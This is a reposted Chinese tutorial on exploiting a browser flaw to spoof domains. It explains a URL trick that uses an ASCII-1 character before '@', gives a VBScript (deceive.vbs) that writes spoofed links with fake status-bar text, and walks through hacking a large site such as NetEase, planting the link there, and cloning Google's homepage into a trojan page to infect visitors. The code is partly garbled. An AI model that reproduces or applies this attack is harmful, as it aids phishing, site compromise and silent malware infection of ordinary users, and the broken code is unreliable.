利用浏览器漏洞实现域名欺骗的过程

来源:百度文库 编辑:神马文学网 时间:2024/04/19 21:00:44

当用户通过浏览器访问一个url,如果这个url是经过以下的格式构造的,那么浏览器实际将访问经过构造的恶意页面,而用户浏览器的地址栏里所显示的将是虚假的url:
url的构造格式为:
_1][special_char]@[url_2]/ target=_blank>http://[url_1][special_char]@[url_2]
说明:
url_1为用户所看到的地址,地址中不可以带/
special_char为一个特殊的字符,即ascii码为1的字符
url_2为恶意页面地址

利用过程

首先请看这个测试页面:


域名欺骗技术实例


你可以看看这两个链接有什么区别:

链接1:


链接2:www.163.com target=_blank>http://www.163.com/; target=_blank http://ww ... ;>www.163.com






这个网页源代码,其中链接1指向了一个vbs脚本,而链接2指向的是163站点。如果我们把连接一的vbs脚本改成下列代码:
''''''''''''''''''''''''''''''''''''''deceive.vbs'''''''''''''''''''''''''''''''''''''''''''''
'(以下请根据实际情况自行修改:)
url1=http://www.163.com/
url2=http://www.google.com/
text=http://www.163.com/
url=_blank ?>http://;&url1&chr(1)& ... p;url2&
dn=/
mouseover=onmouseover=javascript :window.status='_blank ?>http://;&url1&dn&'
mouseout=onmouseout=javascript :window.status=''
click=onclick=javascript :navigate('&url&')
style=style=cursor:hand
tag=&text&
document.write tag
'说明:
'url1是用来欺骗用户的地址.
'url2是实际访问的地址,可以是网页木马、恶意网页等.
'text是链接的文字.
'注意:(以上欺骗地址及实际地址不可以加http://)
'''''''''''''''''''''''''''''''''''''''cuts here''''''''''''''''''''''''''''''''''''''''''''''''

现在大家看到了吧~~当我们点击这个测试页面的时候,链接1指向的是google.com,而且状态栏和地址栏里都显示_blank>http://www.163.com/,链接2却指向163.com。你也许感到不可思议,但这就是域名欺骗漏洞的魅力。

我们可以想象,如果以上的测试页面中的链接1指向的不是google.com,而是我们的网页木马,那就......

不过,一个普通的个人网站没人会看的,这就需要我们把这种假链接添加到别的大网站的页面之中。假设我们入侵了一个比较大的网站,比如网易。这时候就可以把它的页面给改了。
比如有一个文字链接,我们就可以把代码中的xxxxxx改为我们自己的代码:。看到src属性里的deceive.vbs了吗 ?我们要编辑好这个文件,然后上传到要修改的页面目录下。

这样还不行,我们还要把自己的木马网页的界面修改一下。也就是把原来链接到的页面加入到我们自己的木马网页,并且我们的木马网页里的所有链接等内容要和原来的页面一样,否则就会引起用户的怀疑。现在,我们把google网站的首页源代码全部复制下来,添加到我们的网页木马。把复制下来的代码中的图片或者是链接的文件都修改完整,比如logo.gif改为_blank>/UpLoadFiles/NewsPhoto/comalogo.gif,否则网页就和原来的不一样了(图片显示为红色的×,链接也失效),因为用户打开的是你的站点,而你的站点中并没有logo.gif。都修改好后就可以保存文件了。上传到你的网页空间里。

至此,我们的工作已经完成。喝一杯咖啡,休息一会......

当我们进入这个网站后,点击我们修改过的连接,你会发现和原来的页面几乎就一模一样(当然,也有些细微的区别,不过一般很难觉察)。就当人家在浏览这个网页的时候,他已经在不知不觉中中了木马。